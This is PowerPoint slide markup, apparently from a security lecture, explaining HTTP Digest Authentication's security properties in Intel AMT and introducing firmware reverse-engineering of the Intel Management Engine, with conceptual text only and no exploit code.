            </a:r>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clientNonce</a:t>
            </a:r>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qop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> || HA2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2922016-ADEB-4C58-AB33-84722248A9DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-73427"/>
            <a:ext cx="12192000" cy="763448"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP Digest Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="Group 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B605185-9C73-42A3-ADA3-80B66C124ECB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="119259" y="2358178"/>
            <a:ext cx="5066355" cy="2205354"/>
            <a:chOff x="119259" y="2358178"/>
            <a:chExt cx="5066355" cy="2205354"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56A8C35E-6E1A-443E-828C-285C201470FD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="119259" y="3547869"/>
              <a:ext cx="4236170" cy="1015663"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3000" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Incremented by the client after every auth request</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="Left Bracket 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D501F391-4217-4C32-AB60-96A29DEA4C15}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2052899" y="1582224"/>
              <a:ext cx="271431" cy="404487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D068A83-A36C-4457-9238-3C176DA413BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2032804" y="2370210"/>
              <a:ext cx="315281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9ACE61-6100-4FC1-B06C-72D1FDFB828E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2044836" y="2358178"/>
              <a:ext cx="0" cy="111076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0DD9707-B6F9-4D2F-8AEF-6DE28DBEC123}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7338206" y="2117554"/>
            <a:ext cx="4853794" cy="2492144"/>
            <a:chOff x="7338206" y="2117554"/>
            <a:chExt cx="4853794" cy="2492144"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="TextBox 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F37524C3-9C0F-4E2F-BCE6-DF77C093476D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7338206" y="4055700"/>
              <a:ext cx="4853794" cy="553998"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3000" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>A nonce is a random number</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Left Bracket 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90FAAD4B-FCAD-4DF6-A426-6AFC8D5522BA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="9503265" y="1800451"/>
              <a:ext cx="291064" cy="4530128"/>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62BA1AD-85FD-430B-ACB8-8D06BAC0F690}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9144000" y="2117554"/>
              <a:ext cx="0" cy="18024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5B4B7F2-173F-423C-BE96-B3547313D9DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="7852078" y="2847463"/>
              <a:ext cx="129192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id="{75B593F6-11D0-4023-B06F-C920D36138CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="626513" y="5086690"/>
            <a:ext cx="10938973" cy="1621142"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Property 3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> Assuming that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>nonces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> are refreshed during each authentication exchange, a network eavesdropper cannot replay an old successful authentication response.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3D54E42-06D6-4314-A27C-D334E068FCAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="626513" y="5097641"/>
            <a:ext cx="11176467" cy="1621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Property 2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> Assuming that the hash function is difficult to invert, a network eavesdropper can’t derive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C30847F-5B13-4F9E-9402-F27F171E0D82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="626514" y="5086690"/>
            <a:ext cx="10938972" cy="1771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Property 1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> The raw password submission isn’t revealed to the network, but the AMT machine can still determine whether the submitted password is the right one.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F6E08A5-AFDA-4578-A83A-824DC623ED7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-54816" y="549006"/>
            <a:ext cx="1819514" cy="1323439"/>
            <a:chOff x="-54816" y="549006"/>
            <a:chExt cx="1819514" cy="1323439"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="TextBox 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27CA9662-146D-4684-9A13-453C977B330B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-54816" y="549006"/>
              <a:ext cx="1813501" cy="1323439"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Hidden from the network; only computed locally</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Left Bracket 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5557FB09-3BCC-450B-A87C-25EB9A5067DB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1608926" y="676908"/>
              <a:ext cx="155772" cy="905866"/>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921560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fade">
                                      <p:cBhvr>
                                        <p:cTn id="6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p:bldP spid="23" grpId="1"/>
      <p:bldP spid="24" grpId="0"/>
      <p:bldP spid="2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1A5A09-BADF-467D-9D65-FD8E38FF216C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6104635" y="112042"/>
            <a:ext cx="6083358" cy="6513596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED8A61D7-413F-4744-B6DD-A984D5FD120B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="136358" y="-16084"/>
            <a:ext cx="6358688" cy="1768643"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Does Intel’s implementation of HTTP Digest Authentication have security flaws?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D3ED7BA-55FA-407C-95D9-7AC88809AA2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="136358" y="1600368"/>
            <a:ext cx="4411579" cy="125111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sz="3200" dirty="0"/>
              <a:t>Let’s reverse-engineer the ME firmware!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BD2D01C-A526-423B-9ABD-D24D02915ED9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-48128" y="172202"/>
            <a:ext cx="6821905" cy="6685798"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Firmware is low-level software provided by a hardware vendor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Stored in stored in on-device non-volatile memory like flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>May be read-only or updatable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>BIOS (“Basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Input/Output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> System”)     or UEFI (“Unified Extensible Firmware Interface”) firmware:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Coordinates the early boot process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Ex: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Enumerating+testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> hardware devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Ex: Pulling the boot loader from storage into memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Provides post-boot services to the OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Ex: Reading/writing the time and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>timezone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> of the hardware clock</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Ex: Storing or retrieving small amounts of data in non-volatile RAM (e.g., to build event logs that persist across machine reboots)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F0CB3F8-B599-470A-B46D-76D7C07F7B3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9937479" y="2805237"/>
            <a:ext cx="2322707" cy="3896639"/>
            <a:chOff x="9937479" y="2805237"/>
            <a:chExt cx="2322707" cy="3896639"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="11" name="Straight Arrow Connector 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D76FF850-EDAF-4A0F-8DF9-85B7D142366A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11405937" y="2805237"/>
              <a:ext cx="348916" cy="27027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C9EF55E-CC30-4482-B4C4-1FA77172D008}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9937479" y="5501547"/>
              <a:ext cx="2322707" cy="1200329"/>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A DRAM area that belongs to the ME; inaccessible to the normal CPU</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{968F7F0F-8CD1-4DBB-911E-F5C20CD5DC3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6128698" y="3479007"/>
            <a:ext cx="3392907" cy="1750793"/>
            <a:chOff x="6128698" y="3479007"/>
            <a:chExt cx="3392907" cy="1750793"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="Straight Arrow Connector 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{836DE4D5-0886-4C60-944C-024E16E01EAA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="16" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7825152" y="3479007"/>
              <a:ext cx="1258691" cy="11044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E1DF500-5234-4C79-9053-175DBF863EC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6128698" y="4583469"/>
              <a:ext cx="3392907"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Interface allowing the normal CPU to communicate with ME</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3301543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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">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fade">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="40" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="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3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="3" end="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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="4" end="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9">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="5" end="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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">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
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>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9">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>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9">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="70"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72A6-117C-4D48-948D-DABFD542DF5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="52300"/>
            <a:ext cx="10515600" cy="874128"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download the firmware . . .</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4A4204E-7E8C-4FCB-AEBD-C73E638F2121}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="469234" y="981072"/>
            <a:ext cx="11133102" cy="5876928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="363224102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E975C6-512A-49D0-8431-2D774E208F19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
